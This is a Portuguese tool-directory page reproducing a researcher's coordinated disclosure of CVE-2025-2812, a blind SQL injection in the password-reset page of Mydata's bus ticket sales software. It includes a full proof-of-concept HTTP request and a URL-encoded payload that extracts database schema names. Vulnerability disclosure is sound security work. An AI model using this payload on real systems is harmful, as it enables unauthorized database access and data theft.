Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-2812 — CVE-2025-2812 Injeção SQL | Kitploit
Ferramentas/GitHubGitHub/sahici/cve-2025-2812
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoSegurança de Banco de Dados
GitHubsahici/cve-2025-2812

CVE-2025-2812

CVE-2025-2812 Injeção SQL

Ver Repositório
4há 1 anoAinda não revisado
Site

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-2812 — Vulnerabilidade de Injeção SQL no "Bilet Satış Otomasyonu" da Mydata Bilişim Ltd. Şti

📌 CVE-ID: CVE-2025-2812
📢 Aviso USOM: tr-25-0099
🛡️ Tipo de Vulnerabilidade: CWE-89 - SQL Injection (Boolean-based Blind)
🏢 Produto Afetado: Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 Exemplo de URL de Destino: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php


🔍 Resumo da Vulnerabilidade

No produto "Bilet Satış Otomasyonu", foi detectada uma vulnerabilidade de Boolean-based Blind SQL Injection no parâmetro "Primeira letra do seu nome" (ilkHarf) da página de redefinição de senha (SifremiUnuttum.php). Esta vulnerabilidade permite a extração de dados do sistema sem nome de usuário ou senha.

Esta vulnerabilidade afeta os sistemas das seguintes empresas de ônibus:

  • Balıkesir Uludağ
  • Kontur
  • Efe Tur
  • Kale Seyahat
  • +20 empresas

💥 PoC (Prova de Conceito)

📌 Requisição HTTP:

Baixar ferramenta
root@kitploit:~
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************

🧪 Payload Utilizado:

root@kitploit:~
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW

🧠 Detalhes Técnicos

  • Parâmetro Vulnerável: ilkHarf
  • Método: Boolean-based Blind SQLi
  • Tipo de Vulnerabilidade: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

🙏 Agradecimentos

Após a vulnerabilidade que detectamos no produto "Bilet Satış Otomasyonu", desenvolvido pela "Mydata Bilişim Ltd. Şti", esta falha, divulgada com o código CVE-2025-2812, foi anunciada em coordenação com o fabricante e o USOM. Temos orgulho de contribuir com a comunidade de segurança cibernética neste processo.

Após a notificação da vulnerabilidade, a Mydata Bilişim Ltd. Şti implementou rapidamente todos os procedimentos necessários, corrigindo a falha de segurança relevante e integrando medidas de segurança adicionais aos seus sistemas. Agradecemos pela transparência, colaboração e senso de responsabilidade demonstrados ao longo do processo.

Temos orgulho de contribuir com a comunidade de segurança cibernética neste processo.


📬 Contato

Você pode entrar em contato comigo para qualquer pergunta, feedback ou colaboração:

  • 📧 E-mail: [email protected]
  • 📷 Instagram: @yyasar.yasin